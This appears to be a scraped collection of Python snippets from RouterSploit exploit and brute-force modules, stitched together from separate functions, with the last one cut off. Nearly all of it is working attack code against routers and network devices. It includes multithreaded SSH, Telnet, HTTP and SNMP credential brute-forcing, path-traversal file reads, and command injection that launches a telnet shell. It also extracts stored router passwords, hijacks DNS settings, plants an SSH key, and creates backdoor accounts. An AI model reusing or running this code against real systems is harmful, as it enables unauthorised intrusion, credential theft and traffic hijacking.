def ftp_get_config(self):
        print_status("FTP {}:{} Trying FTP authentication with Username: {} and Password: {}".format(self.target,
                                                                                                     self.ftp_port,
                                                                                                     self.remote_user,
                                                                                                     self.remote_pass))
        ftp = ftplib.FTP()

        try:
            ftp.connect(self.target, port=int(self.ftp_port), timeout=10)
            ftp.login(self.remote_user, self.remote_pass)

            print_success("FTP {}:{} Authentication successful".format(self.target, self.ftp_port))
            if self.config_path in ftp.nlst():
                print_status("FTP {}:{} Downloading: {}".format(self.target, self.ftp_port, self.config_path))
                r = StringIO()
                ftp.retrbinary('RETR {}'.format(self.config_path), r.write)
                ftp.close()
                data = r.getvalue()

                creds = re.findall(r'add name=(.*) password=(.*) role=(.*) hash2=(.*) crypt=(.*)\r\n', data)
                if creds:
                    print_success("Found encrypted credentials:")
                    print_table(('Name', 'Password', 'Role', 'Hash2', 'Crypt'), *creds)
                    return creds
                else:
                    print_error("Exploit failed - could not find any credentials")
        except ftplib.all_errors:
            print_error("Exploit failed - FTP error")

        return None
Beispiel #2
0
 def run(self):
     if self.check():
         print_success("Target is vulnerable")
         print_status("Invoking command loop...")
         self.command_loop()
     else:
         print_error("Target is not vulnerable")
    def attack(self):
        url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))

        response = http_request(method="GET", url=url)
        if response is None:
            return

        if response.status_code != 401:
            print_status("Target is not protected by Basic Auth")
            return

        if self.usernames.startswith('file://'):
            usernames = open(self.usernames[7:], 'r')
        else:
            usernames = [self.usernames]

        if self.passwords.startswith('file://'):
            passwords = open(self.passwords[7:], 'r')
        else:
            passwords = [self.passwords]

        collection = LockedIterator(itertools.product(usernames, passwords))

        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Target", "Port", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
Beispiel #4
0
 def run(self):
     if self.check():
         print_success("Target is vulnerable")
         url = "{}:{}".format(self.target, self.port)
         print "Visit: {}/\n".format(url)
     else:
         print_error("Target seems to be not vulnerable")
    def target_function(self, running, data):
        module_verbosity = boolify(self.verbosity)
        name = threading.current_thread().name
        url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))

        print_status(name, 'process is starting...', verbose=module_verbosity)

        while running.is_set():
            try:
                user, password = data.next()
                user = user.encode('utf-8').strip()
                password = password.encode('utf-8').strip()

                response = http_request(method="GET", url=url, auth=(user, password))

                if response.status_code != 401:
                    if boolify(self.stop_on_success):
                        running.clear()

                    print_success("Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
                    self.credentials.append((self.target, self.port, user, password))
                else:
                    print_error("Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
            except StopIteration:
                break

        print_status(name, 'process is terminated.', verbose=module_verbosity)
    def run(self):
        self.credentials = []

        try:
            tn = telnetlib.Telnet(self.target, self.port)
            tn.expect(["login: "******"Login: "******"Connection error {}:{}".format(self.target, self.port))
            return

        if self.defaults.startswith('file://'):
            defaults = open(self.defaults[7:], 'r')
        else:
            defaults = [self.defaults]

        collection = LockedIterator(defaults)
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
Beispiel #7
0
    def run(self):
        rootpath = 'routersploit/modules/'
        path = 'exploits/dlink/'

        # only py exploit files
        modules = [f.replace(".py", "") for f in listdir(rootpath + path) if isfile(join(rootpath + path, f)) and f.endswith(".py") and f != "__init__.py"]

        vulns = []
        for module_name in modules:
            f = path + module_name

            module = imp.load_source('module', rootpath + f + '.py')
            exploit = module.Exploit()

            exploit.target = self.target
            exploit.port = self.port

            res = exploit.check()

            if res is True:
                print_success("{} is vulnerable".format(f))
                vulns.append(f)
            elif res is False:
                print_error("{} is not vulnerable".format(f))
            else:
                print_status("{} could not be verified".format(f))

        print
        if len(vulns):
            print_success("Device is vulnerable!")
            for v in vulns:
                print " - {}".format(v)
        else:
            print_error("Device is not vulnerable to any exploits!")
        print
 def run(self):
     if self.check():
         print_success("Target is vulnerable")
         print_status("Invoking command loop...")
         shell(self, architecture="mipsel", method="wget", binary="wget", location="/var")
     else:
         print_error("Target is not vulnerable")
    def run(self):
        response = self.telnet_login()
        if 'Login not allowed' in response and self.is_port_opened(self.ftp_port):
            print_error("Telnet: {}:{} Authentication through Telnet not allowed".format(self.target, self.telnet_port))
            print_status("FTP and HTTP service active")
            creds = self.ftp_get_config()

            if creds:
                print_status("Use javascript console (through developer tools) to bypass authentication:")
                payload = ('var user = "******"\n'
                           'var hash2 = "{}";\n'
                           'var HA2 = MD5("GET" + ":" + uri);\n'
                           'document.getElementById("user").value = user;\n'
                           'document.getElementById("hidepw").value = MD5(hash2 + ":" + nonce +":" + "00000001" + ":" + "xyz" + ":" + qop + ":" + HA2);\n'
                           'document.authform.submit();\n')

                for user in creds:
                    print_success("User: {} Role: {}".format(user[0], user[2]))
                    print_info(payload.format(user[0], user[3]))

        elif '}=>' in response:
            print_success("Successful authentication through Telnet service")
            tn = telnetlib.Telnet(self.target, int(self.telnet_port), timeout=10)
            tn.read_until(': ')
            tn.write(self.remote_user + '\r\n')
            tn.read_until(': ')
            tn.write(self.remote_pass + '\r\n')
            tn.interact()
        else:
            print_error("Exploit failed - target seems to be not vulnerable")
 def command_loop(self):
     while 1:
         cmd = raw_input("cmd > ")
         try:
             print_info(self.execute(cmd))
         except socket.timeout:
             print_error("No response received. The exploit tends to be unstable though. It is worth trying to run the same command again.")
 def run(self):
     if self.check():
         print_success("Target is vulnerable")
         print "\nUse your browser:"
         print "{}:{}/xslt".format(self.target, self.port)
     else:
         print_error("Target seems to be not vulnerable")
    def run(self):
        if self.check():
            print_success("Target is vulnerable")

            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(30)
            s.connect((self.target, 32764))

            conf = self.execute(s, 1)
            lines = re.split("\x00|\x01", conf)
            pattern = re.compile('user(name)?|password|login');

            credentials = []
            
            for line in lines:
                try:
                    (var, value) = line.split("=")
                    if len(value)>0 and pattern.search(var):
                        credentials.append((var, value))
                except ValueError:
                    pass

            if len(credentials):
                print_table(("Parameter", "Value"), *credentials)
        else:
            print_error("Target is not vulnerable")
    def target_function(self, running, data):
        module_verbosity = boolify(self.verbosity)
        name = threading.current_thread().name
        address = "{}:{}".format(self.target, self.port)

        print_status(name, 'thread is starting...', verbose=module_verbosity)

        while running.is_set():
            try:
                string = data.next().strip()

                bindvariable = netsnmp.Varbind(".1.3.6.1.2.1.1.1.0")
                res = netsnmp.snmpget(bindvariable, Version=1, DestHost=address, Community=string)

                if res[0] is not None:
                    running.clear()
                    print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
                    self.strings.append((self.target, self.port, string))
                else:
                    print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)

            except StopIteration:
                break

        print_status(name, 'thread is terminated.', verbose=module_verbosity)
Beispiel #14
0
    def run(self):
        self.credentials = []
        print_status("Running module...")
        ssh = paramiko.SSHClient()

        try:
            ssh.connect(self.target, port=self.port)
        except socket.error:
            print_error("Connection error: %s:%s" % (self.target, str(self.port)))
            ssh.close()
            return
        except:
            pass

        ssh.close()

        if self.usernames.startswith('file://'):
            usernames = open(self.usernames[7:], 'r')
        else:
            usernames = [self.usernames]

        if self.passwords.startswith('file://'):
            passwords = open(self.passwords[7:], 'r')
        else:
            passwords = [self.passwords]

        collection = LockedIterator(itertools.product(usernames, passwords))
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.credentials):
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")
    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")
            file_path = "..{}".format(self.filename)

            url = "{}:{}/apply.cgi".format(self.target, self.port)
            data = {"html_response_page": file_path,
                    "action": "do_graph_auth",
                    "login_name": "test",
                    "login_pass": "******",
                    "&login_n": "test2",
                    "log_pass": "******",
                    "graph_code": "63778",
                    "session_id": "test5",
                    "test": "test"}

            print_status("Sending request payload using credentials: {} / {}".format(self.username, self.password))
            response = http_request(method="POST", url=url, data=data, auth=(self.username, self.password))
            if response is None:
                return

            if response.status_code == 200:
                print_status("File: {}".format(self.filename))
                print_info(response.text)
            else:
                print_error("Exploit failed - could not read response")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")
    def run(self):
        creds = []
        url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))

#        print_status("Requesting for {}".format(url))

        response = http_request(method="GET", url=url)
        if response is None:
            return

        admin = re.findall("pwdAdmin = '(.+?)'", response.text)
        if admin:
            creds.append(('admin', admin[0]))

        support = re.findall("pwdSupport = '(.+?)'", response.text)
        if support:
            creds.append(('support', support[0]))

        user = re.findall("pwdUser = '******'", response.text)
        if user:
            creds.append(('user', user[0]))

        if creds:
            print_success("Credentials found!")
            print_table(("Login", "Password"), *creds)
        else:
            print_error("Credentials could not be found")
Beispiel #17
0
    def run(self):
        cmd = "utelnetd -l /bin/sh -p {} -d".format(self.telnetport)

        if self.execute1(cmd) or self.execute2(cmd):
            self.telnet_connect()
        else:
            print_error("Exploit failed")
    def run(self):
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        try:
            client.connect(self.target, username='', allow_agent=False, look_for_keys=False)
        except paramiko.ssh_exception.SSHException:
            pass
        except:
            print_error("Exploit Failed - SSH Service is down")
            return

        trans = client.get_transport()
        try:
            trans.auth_password(username='******', password='', event=None, fallback=True)
        except paramiko.ssh_exception.AuthenticationException:
            pass
        except:
            print_status("Error with Existing Session. Wait few minutes.")
            return

        try:
            trans.auth_interactive(username='******', handler=self.custom_handler)

            print_success("Exploit succeeded")
            ssh_interactive(client)
        except:
            print_error("Exploit failed")
            return
    def target_function(self, running, data):
        module_verbosity = boolify(self.verbosity)
        name = threading.current_thread().name
        url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
        headers = {u'Content-Type': u'application/x-www-form-urlencoded'}

        print_status(name, 'process is starting...', verbose=module_verbosity)

        while running.is_set():
            try:
                line = data.next().split(":")
                user = line[0].strip()
                password = line[1].strip()

                postdata = self.data.replace("{{USER}}", user).replace("{{PASS}}", password)
                r = requests.post(url, headers=headers, data=postdata, verify=False)
                l = len(r.text)

                if l < self.invalid["min"] or l > self.invalid["max"]:
                    running.clear()
                    print_success("{}: Authentication succeed!".format(name), user, password, verbose=module_verbosity)
                    self.credentials.append((user, password))
                else:
                    print_error(name, "Authentication Failed - Username: '******' Password: '******'".format(user, password), verbose=module_verbosity)
            except StopIteration:
                break

        print_status(name, 'process is terminated.', verbose=module_verbosity)
    def run(self):
        url = "{}:{}/UD/?5".format(self.target, self.port)
        headers = {
            "SOAPACTION": '"urn:dslforum-org:service:UserInterface:1#GetLoginPassword"',
            "Content-Type": 'text/xml; charset="utf-8"',
            "Expect": "100-continue",
        }
        data = (
            '<?xml version="1.0"?>'
            '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
            "<s:Body>"
            '<m:GetLoginPassword xmlns:m="urn:dslforum-org:service:UserInterface:1">'
            "</m:GetLoginPassword>"
            "</s:Body>"
            "</s:Envelope>"
        )

        response = http_request(method="POST", url=url, headers=headers, data=data)
        if response is None:
            return

        r = re.compile("<NewUserpassword>(.*?)</NewUserpassword>")
        m = r.search(response.text)

        if m:
            print_success("Password has been found")
            print_info("Password: {}".format(m.group(1)))
        else:
            print_error("Exploit failed - could not find password")
    def run(self):
        url = sanitize_url("{}:{}/SaveCfgFile.cgi".format(self.target, self.port))

        try:
            r = requests.get(url, verify=False)
            res = r.text
        except requests.exceptions.ConnectionError:
            print_error("Connection error: %s" % url)
            return

        var = ['pppoe_username',
                'pppoe_password',
                'wl0_pskkey',
                'wl0_key1',
                'mradius_password',
                'mradius_secret',
                'httpd_password',
                'http_passwd',
                'pppoe_passwd']

        data = []
        for v in var:
            regexp = '{}="(.+?)"'.format(v)

            val = re.findall(regexp, res)
            if len(val):
                data.append((v, val[0]))

        if len(data):
            print_success("Exploit success")
            headers = ("Option", "Value")
            print_table(headers, *data)

        else:
            print_error("Exploit failed")
 def run(self):
     if self.check():
         print_success("Target is vulnerable")
         print_status("Invoking command loop...")
         shell(self, architecture="none", method="awk", binary="awk")
     else:
         print_error("Target is not vulnerable")
Beispiel #23
0
    def target_function(self, running, data):
        module_verbosity = boolify(self.verbosity)
        name = threading.current_thread().name

        print_status(name, 'thread is starting...', verbose=module_verbosity)

        cmdGen = cmdgen.CommandGenerator()
        while running.is_set():
            try:
                string = data.next().strip()

                errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd(
                    cmdgen.CommunityData(string),
                    cmdgen.UdpTransportTarget((self.target, int(self.port))),
                    '1.3.6.1.2.1.1.1.0',
                )

                if errorIndication or errorStatus:
                    print_error("Target: {}:{} {}: Invalid community string - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
                else:
                    if boolify(self.exit_on_success):
                        running.clear()
                    print_success("Target: {}:{} {}: Valid community string found - String: '{}'".format(self.target, self.port, name, string), verbose=module_verbosity)
                    self.strings.append((self.target, self.port, string))

            except StopIteration:
                break

        print_status(name, 'thread is terminated.', verbose=module_verbosity)
Beispiel #24
0
 def run(self):
     if self.check():
         print_success("Target is vulnerable")
         print_status("Invoking command loop...")
         shell(self, architecture="mipsbe")
     else:
         print_error("Target is not vulnerable")
    def target_function(self, running, data):
        module_verbosity = boolify(self.verbosity)
        name = threading.current_thread().name
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        print_status(name, 'thread is starting...', verbose=module_verbosity)

        while running.is_set():
            try:
                user, password = data.next()
                user = user.strip()
                password = password.strip()
                ssh.connect(self.target, int(self.port), timeout=5, username=user, password=password)
            except StopIteration:
                break
            except paramiko.ssh_exception.SSHException as err:
                ssh.close()
                print_error("Target: {}:{} {}: {} Username: '******' Password: '******'".format(self.target, self.port, name, err, user, password), verbose=module_verbosity)
            else:
                if boolify(self.stop_on_success):
                    running.clear()

                print_success("Target: {}:{} {} Authentication Succeed - Username: '******' Password: '******'".format(self.target, self.port, name, user, password), verbose=module_verbosity)
                self.credentials.append((self.target, self.port, user, password))

        print_status(name, 'thread is terminated.', verbose=module_verbosity)
    def execute(self, cmd):
        if len(cmd) > 237:
            print_error('Your command must be at most 237 characters long. Longer strings might crash the server.')
            return

        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.bind(('0.0.0.0', 9999))
        sock.settimeout(2)

        packet = (b'\x0C\x15\x33\x00'+ os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00')

        try:
            sock.sendto(packet, (self.target, 9999))
        except socket.error:
            return ""

        while True:
            try:
                data, addr = sock.recvfrom(512)
            except socket.timeout:
                sock.close()
                return ""
            if len(data) == 512 and data[1] == "\x16":
                break
        length = struct.unpack('<H', data[14:16])[0]
        output = data[16:16+length]
        sock.close()
        return output
    def run(self):
        if self.check():
            url = sanitize_url("{}:{}/password.cgi".format(self.target, self.port))
            print_status("Requesting for {}".format(url))

            response = http_request(method="GET", url=url)
            if response is None:
                return

            regexps = [("admin", "pwdAdmin = '(.+?)'"),
                       ("support", "pwdSupport = '(.+?)'"),
                       ("user", "pwdUser = '******'")]

            creds = []
            for regexp in regexps:
                res = re.findall(regexp[1], response.text)

                if len(res):
                    creds.append((regexp[0], b64decode(res[0])))

            if len(creds):
                print_success("Credentials found!")
                headers = ("Login", "Password")
                print_table(headers, *creds)
                print("NOTE: Admin is commonly implemented as root")
            else:
                print_error("Credentials could not be found")
        else:
            print_error("Device seems to be not vulnerable")
    def run(self):
        url = "{}:{}/SaveCfgFile.cgi".format(self.target, self.port)

        response = http_request(method="GET", url=url)
        if response is None:
            return

        var = [
            'pppoe_username',
            'pppoe_password',
            'wl0_pskkey',
            'wl0_key1',
            'mradius_password',
            'mradius_secret',
            'httpd_password',
            'http_passwd',
            'pppoe_passwd'
        ]

        data = []
        for v in var:
            regexp = '{}="(.+?)"'.format(v)

            val = re.findall(regexp, response.text)
            if len(val):
                data.append((v, val[0]))

        if len(data):
            print_success("Exploit success")
            headers = ("Option", "Value")
            print_table(headers, *data)

        else:
            print_error("Exploit failed")
    def run(self):
        # address and parameters
        url = "{}:{}/cgi-bin/webproc".format(self.target, self.port)
        data = {
            "getpage": "html/index.html",
            "*errorpage*": "../../../../../../../../../../..{}".format(self.filename),
            "var%3Amenu": "setup",
            "var%3Apage": "connected",
            "var%": "",
            "objaction": "auth",
            "%3Ausername": "******",
            "%3Apassword": "******",
            "%3Aaction": "login",
            "%3Asessionid": "abcdefgh"
        }

        # connection
        response = http_request(method="POST", url=url, data=data)
        if response is None:
            return

        if response.status_code == 200:
            print_success("Exploit success")
            print_status("File: {}".format(self.filename))
            print response.text
        else:
            print_error("Exploit failed")
Beispiel #30
0
 def run(self):
     if self.check():
         print_success("Target seems to be vulnerable")
         print_status("Invoking command loop...")
         shell(self, architecture="mipsle")
     else:
         print_error("Exploit failed - target seems to be not vulnerable")
Beispiel #31
0
    def run(self):
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(10)

        print_status("Sending exploit payload")
        sock.sendto(self.payload, (self.target, 43690))

        try:
            print_status("Waiting for response")
            response = sock.recv(1024)
        except:
            print_error("Exploit failed - device seems to be not vulnerable")
            return

        if len(response):
            print_success("Exploit success")
            print_info(response)
Beispiel #32
0
    def run(self):
        url = "{}:{}/error_page.htm".format(self.target, self.port)

        response = http_request(method="GET", url=url)
        if response is None:
            return

        creds = re.findall("if\('1' == '0' \|\| '(.+?)' == 'admin'\)",
                           response.text)

        if len(creds):
            c = [("admin", creds[0])]
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *c)
        else:
            print_error("Credentials could not be found")
    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")
            url = "{}:{}/imc/report/DownloadReportSource?dirType=webapp&fileDir=reports&fileName=reportParaExample.xml..\..\..\..\..\..\..\..\..\..{}".format(
                self.target, self.port, self.filename)

            print_status("Sending paylaod request")
            response = http_request(method="GET", url=url)
            if response is None:
                return

            if response.status_code == 200 and len(response.text):
                print_success("Exploit success - reading {} file".format(
                    self.filename))
                print_info(response.text)
        else:
            print_error("Exploit failed - target seems to be not vulnerable")
Beispiel #34
0
    def execute1(self, cmd):
        print_status("Trying to exploit first command injection vulnerability...")
        url = "{}:{}/cgi-bin/adv_remotelog.asp".format(self.target, self.port)

        payload = "1.1.1.1;{};#".format(cmd)

        data = {"RemotelogEnable": "1",
                "syslogServerAddr": payload,
                "serverPort": "514"}

        response = http_request(method="POST", url=url, data=data)

        if response is not None and response.status_code != 404:
            return True

        print_error("Exploitation failed for unauthenticated command injection")
        return False
    def run(self):
        url = sanitize_url("{}:{}/login.stm".format(self.target, self.port))

        response = http_request(method="GET", url=url)
        if response is None:
            return

        val = re.findall('password = "******"', response.text)

        if len(val):
            print_success("Exploit success")
            data = [('admin', val[0])]
            headers = ("Login", "MD5 Password")
            print_table(headers, *data)

        else:
            print_error("Exploit failed. Device seems to be not vulnerable.")
Beispiel #36
0
    def run(self):
        if self.check():
            url = "{}:{}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../..{}".format(
                self.target, self.port, self.filename)

            response = http_request(method="GET", url=url)
            if response is None:
                return

            if response.status_code == 200 and len(response.text):
                print_success("Exploit success - reading file {}".format(
                    self.filename))
                print_info(response.text)
            else:
                print_error("Exploit failed - could not read file")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")
Beispiel #37
0
    def run(self):
        if self.check():
            url = "{}:{}/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../..{}".format(
                self.target, self.port, self.filename)

            response = http_request(method="GET", url=url)
            if response is None:
                return

            if response.status_code == 200 and len(response.text):
                print_success("Exploit success")
                print_status("Reading file: {}".format(self.filename))
                print_info(response.text)
            else:
                print_error("Exploit failed - could not read file")
        else:
            print_error("Exploit failed - device seems to be not vulnerable")
Beispiel #38
0
    def run(self):
        url = "{}:{}/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary={}&dnsSecondary={}".format(self.target,
                                                                                             self.port,
                                                                                             self.dns1,
                                                                                             self.dns2)

        print_status("Attempting to change DNS settings...")
        print_status("Primary DNS: {}".format(self.dns1))
        print_status("Secondary DNS: {}".format(self.dns2))

        response = http_request(method="POST", url=url)
        if response is None:
            return

        if response.status_code == 200:
            print_success("DNS settings has been changed")
        else:
            print_error("Could not change DNS settings")
Beispiel #39
0
    def run(self):
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        try:
            ssh.connect(self.target,
                        self.ssh_port,
                        timeout=5,
                        username=self.user,
                        password=self.password)
        except (paramiko.ssh_exception.SSHException, socket.error):
            print_error(
                "Exploit failed - cannot log in with credentials {} / {}".
                format(self.user, self.password))
            return
        else:
            print_success("SSH - Successful authentication")
            ssh_interactive(ssh)
    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")
            url = "{}:{}{}".format(self.target, self.port, self.valid)

            print_status("Sending request to download sensitive information")
            response = http_request(method="GET", url=url)
            if response is None:
                return

            if response.status_code == 200 and len(response.text):
                print_status("Reading {}".format(self.valid))
                print_info(response.text)
            else:
                print_error("Exploit failed - could not retrieve response")

        else:
            print_error("Exploit failed - target seems to be not vulnerable")
Beispiel #41
0
    def run(self):
        if self.check():
            url = "{}:{}/cgi-bin/webproc?getpage={}&errorpage=html/main.html&var:language=en_us&var:language=en_us&var:page=BAS_bpa".format(
                self.target, self.port, self.filename)

            response = http_request(method="GET",
                                    url=url,
                                    auth=(self.username, self.password))
            if response is None:
                return

            if response.status_code == 200 and len(response.text):
                print_success("Success! File: %s" % self.filename)
                print response.text
            else:
                print_error("Exploit failed")
        else:
            print_error("Device seems to be not vulnerable")
Beispiel #42
0
    def attack(self):

        # todo: check if service is up

        if self.snmp.startswith('file://'):
            snmp = open(self.snmp[7:], 'r')
        else:
            snmp = [self.snmp]

        collection = LockedIterator(snmp)
        self.run_threads(self.threads, self.target_function, collection)

        if len(self.strings):
            print_success("Credentials found!")
            headers = ("Target", "Port", "Community Strings")
            print_table(headers, *self.strings)
        else:
            print_error("Valid community strings not found")
Beispiel #43
0
    def run(self):
        url = "{}:{}/dnscfg.cgi?dnsPrimary={}&dnsSecondary={}&dnsDynamic=0&dnsRefresh=1&dnsIfcsList=".format(self.target,
                                                                                                             self.port,
                                                                                                             self.dns1,
                                                                                                             self.dns2)

        print_status("Attempting to change DNS settings...")
        print_status("Primary DNS: {}".format(self.dns1))
        print_status("Secondary DNS: {}".format(self.dns2))

        response = http_request(method="POST", url=url)
        if response is None:
            return

        if response.status_code == 200:
            print_success("DNS settings has been changed")
        else:
            print_error("Could not change DNS settings")
    def run(self):
        ssh = paramiko.SSHClient()
        ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())

        try:
            ssh.connect(self.target,
                        22,
                        timeout=5,
                        username=self.username,
                        password=self.password)
        except:
            ssh.close()
        else:
            print_success("SSH - Successful authentication")

            cmd = ""
            while cmd not in ["quit", "exit"]:
                cmd = raw_input("> ")
                stdin, stdout, stderr = ssh.exec_command(cmd.strip())
                print stdout.channel.recv(2048)
            return

        try:
            tn = telnetlib.Telnet(self.target, 23)
            tn.expect(["Login: "******"login: "******"\r\n")
            tn.expect(["Password: "******"password"], 5)
            tn.write(self.password + "\r\n")
            tn.write("\r\n")

            (i, obj, res) = tn.expect(["Incorrect", "incorrect"], 5)

            if i != -1:
                return False
            else:
                if any(map(lambda x: x in res, ["#", "$", ">"])):
                    print_success("Telnet - Successful authentication")
                    tn.write("\r\n")
                    tn.interact()

            tn.close()
        except:
            print_error("Connection Error")
            return
    def run(self):
        if self.device < 0 or self.device >= len(self.payloads):
            print_error(
                "Set target device - use \"show devices\" and \"set device <id>\""
            )
            return

        if self.action not in ["set", "unset"]:
            print_error(
                "Specify action: set / unset credless authentication for Telnet service"
            )
            return

        print_status("Trying to connect to Telnet service on port {}".format(
            self.telnet_port))

        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(10.0)

            s.connect((self.target, int(self.telnet_port)))

            print_status("Connection OK")
            print_status("Received bytes from telnet service: {}".format(
                repr(s.recv(1024))))
        except Exception:
            print_error("Connection failed")
            return

        print_status("Building payload...")
        payload = self.build_payload()

        if self.action == 'set':
            print_status("Setting credless privilege 15 authentication")
        else:
            print_status("Unsetting credless privilege 15 authentication")

        print_status("Sending cluster option")
        s.send(payload)
        s.close()

        print_status("Payload sent")

        if self.action == 'set':
            print_status("Connecting to Telnet service...")
            try:
                t = telnetlib.Telnet(self.target,
                                     int(self.telnet_port),
                                     timeout=10)
                t.interact()
            except Exception:
                print_error("Exploit failed")
        else:
            print_status("Check if Telnet authentication was set back")
Beispiel #46
0
    def login(self):
        url = "{}:{}/login.cgi?logout=1".format(self.target, self.port)

        data = {"username": self.username,
                "password": self.password,
                "target": ""}

        print_status("Trying to authenticate")
        response = http_request(method="POST", url=url, data=data, allow_redirects=False, session=self.session)
        if response is None:
            return False

        if response.status_code == 302 and "CGISESSID" in response.cookies.keys():
            print_status("CGI Session ID: {}".format(response.cookies['CGISESSID']))
            print_success("Authenticated as {}:{}".format(self.username, self.password))
            return True

        print_error("Exploit failed. Could not authenticate.")
        return False
    def run(self):
        url = "{}:{}/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd".format(
            self.target, self.port)

        response = http_request(method="GET", url=url)
        if response is None:
            return

        creds = re.findall(
            "<center>\t\t\t\n\t\t\t<table> <tr> <td>\n\t\t\t(.+?)\n\n\t\t\t</td>",
            response.text)
        if len(creds):
            c = creds[0].split(":")
            creds = [(c[0], c[1])]
            print_success("Credentials found!")
            headers = ("Login", "Password")
            print_table(headers, *creds)
        else:
            print_error("Credentials could not be found")
    def run(self):
        if self.check():
            print_success('Target is vulnerable')
            print_success('Trying to exploit by uploading SSH public key')

            key = paramiko.RSAKey.generate(1024)
            public_key = key.get_base64()
            private_key = StringIO.StringIO()
            key.write_private_key(private_key)

            tmp_file_pubkey = tempfile.TemporaryFile()
            tmp_file_pubkey.write('ssh-rsa ' + public_key)
            tmp_file_pubkey.seek(0)

            upload_params = {'file': ('../../etc/dropbear/authorized_keys', tmp_file_pubkey, {'Expect': ''})}

            upload_url = '{0}:{1}/login.cgi' .format(self.target, self.port)
            response = http_request(url=upload_url, method='POST', files=upload_params)

            if response is None:
                print_error('Something was wrong while uploading the SSH Public Key')
                return

            print_success('Appareantly the exploit worked fine')
            print_success('Trying to invoke a interactive SSH Shell')

            client = paramiko.SSHClient()
            client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

            pseudo_privkey_file = StringIO.StringIO(private_key.getvalue())
            pkey = paramiko.RSAKey.from_private_key(pseudo_privkey_file)
            pseudo_privkey_file.close()
            private_key.close()

            ip_target = self.target.replace('https://', '')
            ip_target = ip_target.replace('http://', '')
            ip_target = ip_target.replace('/', '')

            client.connect(ip_target, self.ssh_port, username='******', pkey=pkey)
            ssh_interactive(client)

        else:
            print_error('Target is not vulnerable')
    def run(self):
        creds = []
        url = "{}:{}/s_brief.htm".format(self.target, self.port)

        print_status("Sending payload request")
        response = http_request(method="GET", url=url)
        if response is None:
            return

        print_status("Extracting credentials")
        username = re.findall('<input type="text" name="szUsername" size=16 value="(.+?)">', response.text)
        password = re.findall('<input type="password" name="szPassword" size=16 maxlength="16" value="(.+?)">', response.text)

        if len(username) and len(password):
            print_success("Exploit success")
            creds.append((username[0], password[0]))
            print_table(("Login", "Password"), *creds)
        else:
            print_error("Exploit failed - could not extract credentials")
Beispiel #50
0
    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            print_status(
                "It is blind command injection - response is not available")

            if self.arch == "mipsbe":
                shell(self,
                      architecture="mipsbe",
                      method="wget",
                      location="/tmp")
            elif self.arch == "mipsle":
                shell(self,
                      architecture="mipsle",
                      method="wget",
                      location="/tmp")
        else:
            print_error("Target is not vulnerable")
Beispiel #51
0
    def run(self):
        self.session = requests.Session()

        if self.check():
            print_success("Target seems to be vulnerable")
            if self.login():
                if not self.newusername:
                    self.newusername = random_text(8)
                if not self.newpassword:
                    self.newpassword = random_text(8)

                self.create_ssh_backdoor(self.newusername, self.newpassword)

                # Log into the SSH backdoor account
                self.init_ssh_session(self.newusername, self.newpassword)
            else:
                print_error("Exploit failed. Could not log in")
        else:
            print_error("Exploit failed. Target seems to be not vulnerable.")
Beispiel #52
0
    def attack(self):
        url = sanitize_url("{}:{}{}".format(self.target, self.port,
                                            self.get_form_path()))

        try:
            requests.get(url, verify=False)
        except (requests.exceptions.MissingSchema,
                requests.exceptions.InvalidSchema):
            print_error("Invalid URL format: %s" % url)
            return
        except requests.exceptions.ConnectionError:
            print_error("Connection error: %s" % url)
            return

        # authentication type
        if self.form == 'auto':
            form_data = self.detect_form()

            if form_data is None:
                print_error("Could not detect form")
                return

            (form_action, self.data) = form_data
            if form_action:
                self.path = form_action
        else:
            self.data = self.form

        print_status("Using following data: ", self.data)

        # invalid authentication
        self.invalid_auth()

        # running threads
        if self.usernames.startswith('file://'):
            usernames = open(self.usernames[7:], 'r')
        else:
            usernames = [self.usernames]

        if self.passwords.startswith('file://'):
            passwords = open(self.passwords[7:], 'r')
        else:
